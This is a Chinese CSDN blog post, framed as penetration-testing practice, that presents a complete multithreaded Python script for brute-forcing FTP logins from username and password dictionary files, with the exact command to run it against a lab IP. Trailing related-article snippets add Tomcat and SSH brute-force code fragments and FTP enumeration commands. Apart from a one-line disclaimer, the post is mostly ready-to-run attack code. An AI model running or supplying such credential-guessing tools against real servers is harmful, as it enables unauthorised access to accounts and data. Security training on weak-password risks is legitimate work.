Python 渗透测试:文件传输爆破( 21端口 )

已于 2024-05-16 20:06:01 修改
阅读量3k 收藏 56
点赞数 52
分类专栏: # Python 渗透测试 编程实战. # 弱口令漏洞 领域. 文章标签: 安全 网络 python 系统安全 安全架构
于 2022-05-21 08:11:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54977781/article/details/124855426
版权

目录:

Python开发 代码:

(1)利用 FTP模块 实现协议爆破脚本.

(2)在命令行下执行脚本.(这里我服务器修改 FTP协议端口 为221. )

 (3)效果图.

(4)端口连接.

免责声明:

严禁利用本文章中所提到的工具和技术进行非法攻击,否则后果自负,上传者不承担任何责任。

Python开发 代码:

(1)利用 FTP模块 实现协议爆破脚本.

import ftplib       #FTP模块.
import sys          #传递模块.
import threading    #多线程用的.
import queue        #多线程用的.

#爆破要准备:IP,端口,用户名,密码字典.
def ftp_brute(ip,port):
    ftp = ftplib.FTP()                  #创建一个对象.
    ftp.connect(ip, int(port))          #尝试连接FTP,IP是输入的IP,port是输入的端口.
    while not  q.empty():               #接收下面传递的数据.
        dict=q.get()                    #用get形式来接收数据.
        dict=dict.split('|')            #把数据从 | 进行拆分.
        username=dict[0]                #第一个数据.
        password=dict[1]                #第二个数据.
        try:                                            #异常处理(成功的).
            ftp.login(username,password)                #尝试登录,usef账号字典,passf密码字典.
            ftp.retrlines('list')                       #获取列表信息.
            print(username+'|'+password+'|成功!')        #连接成功就打印账号和密码.
        except ftplib.all_errors:                       #错误的.
            print(username + '|' + password + '|失败!')
            pass

if __name__ == '__main__':
    ip=sys.argv[1]                          #输入的IP地址
    port=sys.argv[2]                        #输入的端口
    usefile=sys.argv[3]                     #输入的账号字典
    passfile=sys.argv[4]                    #输入的密码字典
    threading_unm =sys.argv[5]              #输入线程数
    q=queue.Queue()                         #传递模块.
    for username in open(usefile):                          #开打输入的字典文件,每一行还要取出来.
        for password in  open(passfile):                    #开打输入的字典文件,每一行还要取出来.
            username=username.replace('\n','')              #把\n替换为空
            password=password.replace('\n','')              #把\n替换为空
            zidian=username + '|' + password
            q.put(zidian)                                   #把账号和密码发送过去(发送到上面).

    for x in range(int(threading_unm)):                     #设置多线程(上面有输入的)
        t=threading.Thread(target=ftp_brute,args=(ip,int(port)))    #利用threading.Thread模块,target要执行的函数名,处理args传入的参数
        t.start()                                           #开启.

     

(2)在命令行下执行脚本.( 这里我服务器修改 FTP 协议端口 为221端口

D:\pycharm开发代码\渗透脚本>D:\python-3.10.4\python.exe 利用FTP模块实现协议爆破脚本.py 192.168.43.183 221 Uset.txt pass.txt 200

       

 (3)效果图.

    

(4)端口连接.

      

     

半个西瓜.
关注
专栏目录
Python安全攻防:渗透测试实战指南》配套技术讲解
Ms08067安全实验室
11-10 3255
如果你立志成为一名合格的安全从业者,想突破“脚本小子”的瓶颈,成为真正的黑客,想拥有自己打造出来的属于自己的神兵利器!《Python安全攻防:渗透测试实战指南》已经出版,配套星球现在可以...
内部视频放送 |《Python安全攻防:渗透测试实战指南》知识星球
Ms08067安全实验室
06-24 3892
如果你立志成为一名合格的安全从业者,想突破“脚本小子”的瓶颈,成为真正的黑客,想拥有自己打造出来的属于自己的神兵利器!《Python安全攻防:渗透测试实战指南》马上就要出版,配套知识星球...
弱口令超级扫描,可扫描3389,1433,22,21端口并且爆破密码
04-23
弱口令超级扫描,可扫描3389,1433,22,21端口并且爆破密码,效率快,准确率高 还支持C段,输入一个域名可以批量关联服务器,还能自动获取2级域名和旁站域名进行安全探测
Python 开发-多线程爆破
xhscxj的博客
06-05 694
1.ftplib 模块使用 2.遍历用户及密码字典 3.尝试连接执行命令判断 异或一句话免杀php
kali linux网络安全弱口令爆破常用命令(二)
最新发布
qq_53058639的博客
08-22 743
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
Python爆破8-多线程同时爆破
m0_61786761的博客
09-21 455
提示:当用户名较多时,注意限制调用线程的数量。
python多线程ssh爆破
angaoux03775的博客
02-23 266
本周需要给客户做渗透测试,扫描器中发现客户存在SSH弱口令,于是在网上找个一个SSH爆破的脚本,顺便改了一下,测试,虽然没成功~ 程序目录如下: |--ssh.scan.py |--/log: sshd |--/dict: ip password下面上源码吧,文件保存为ssh.scan.py,查看使用方式:python ssh.scan.py -h ...
Python 渗透测试:FTP 文件传输 爆破.(21端口
网络安全领域___专研者.
05-18 778
文件传输是指在计算机网络中将数据从一个位置传输到另一个位置的过程。文件传输爆破是一种黑客攻击手段,主要针对文件传输系统的漏洞进行暴力破解.
渗透测试】一次运气很好的文件上传
HBohan的博客
10-13 456
文件上传 发现源代码泄露 打开自己珍藏已久的辣鸡字典,扫描发现存在bin.zip信息泄露,尝试进行代码审计 文件位置:SimpleDataPlatform.SimpleDataPlatform.fileUpload 找到ProccessRequest接收请求,可以看到获取了一堆参数后(初始化),后进入了HandleFiles方法, 跟进HandleFiles进行处理,如果dateType=ZBJHSB时,就继续处理请求,dateType为GET传参 路径为/Uploads/SetData/ZBJHSB.
全!Web渗透测试:信息收集篇
Appleteachers的博客
05-13 1860
事情是这样的 正准备下班的python开发小哥哥 接到女朋友今晚要加班的电话 并给他发来一张背景模糊的自拍照 敏感的小哥哥心生疑窦,难道会有原谅帽 然后python撸了一段代码 分析照片 分析下来 emmm 拍摄地址居然在 XXX酒店 小哥哥崩溃之余 大呼上当 python分析照片 小哥哥将发给自己的照片原图下载下来 并使用python写了一个脚本 读取到了照片拍摄的详细的地址 详细到了具体的街道和酒店名称 引入exifread模块 首先安装python的exifread模块,用于照片分析 pip inst
10.100个渗透测试实战#10(DC-5)
qwsn
03-30 2745
世间一切即可努力 ...
python3实现多线程破解tomcat简单密码
09-16
python3 http.client库实现的登录验证密码程序。 内含多个密码文件。 for server in ip: print( "[+] Server:",server) print ("[+] Port:",port) print ("[+] Users Loaded:",len(WEAK_USERNAME)) print( "[+] Words Loaded:",len(WEAK_PASSWORD)) print ("[+] Started",timer(),"\n") for I in range(len(accounts)): work = Tomcatbrute(server,port,path,accounts[I][0],accounts[I][1]) work.setDaemon(1) work.start() time.sleep(0.1) print( "\n[-] Done -",timer(),"\n" )
详细 21端口入侵
02-06
弱口令 21端口入侵
python ssh 爆破_python多线程ssh爆破
weixin_39535125的博客
12-15 283
本周需要给客户做渗透测试,扫描器中发现客户存在SSH弱口令,于是在网上找个一个SSH爆破的脚本,顺便改了一下,测试,虽然没成功~程序目录如下:|--ssh.scan.py|--/log:sshd|--/dict:ippassword下面上源码吧,文件保存为ssh.scan.py,查看使用方式:python ssh.scan.py -h#!/usr/bin/python python#-*- cod...
端口渗透——21端口FTP
negnegil的博客
09-15 8065
21端口开启的服务FTP代表文件传输协议,其用于在计算机网络上的客户端和服务器之间传输文件。默认端口21,当共享数据时会被打开。 枚举ftp服务的版本信息 nc -vn <ip> 21 获取FTP证书(如果存在) openssl s_client -connect <ip>:21 -starttls ftp 匿名登录 文件可以被隐藏,所以匿名登录可能看不到文件 ftp <ip> >anonymous >anonymous >ls -a 浏览器连
python爆破脚本_多线程爆破脚本(python3)
weixin_39598941的博客
12-15 1317
#!/usr/bin/env python3# -*- coding: utf-8 -*-import loggingimport argparseimport queueimport requestsimport threadingimport osimport timeimport randomfrom html.parser import HTMLParserfrom requests.pa...
8.使用hydra对端口进行爆破
weixin_30483697的博客
11-18 1823
如果对开启端口的服务不清楚,请看我之前写的文章:https://www.cnblogs.com/bmjoker/p/8833316.html 2018,网站的防护(sql,xss...)的安全保护也已经上升了一个等级,但是由于管理员的安全意识薄弱,网站弱口令漏洞依然猖獗,不信可以看补天的漏洞提交记录,弱口令依然是漏洞中的佼佼者,当然弱口令并不仅限于网站的后台登陆弱口令,还有端口,比如 Ftp:2...
Metasploitable2 渗透测试(ftp 端口21
半夜好饿的博客
09-17 3645
端口扫描: 输入search scanner/ftp找到辅助的扫描工具。 1、利用auxiliary/scanner/ftp/ftp_version模块。 使用auxiliary/scanner/ftp/ftp_version模块,并设置好目标地址,端口采用默认的21,exploit -j开始,查看ftp的版本,版本是vsFTPd 2.3.4 继续search vsFTPd看看有没有可以利用...
评论 77
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

半个西瓜.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值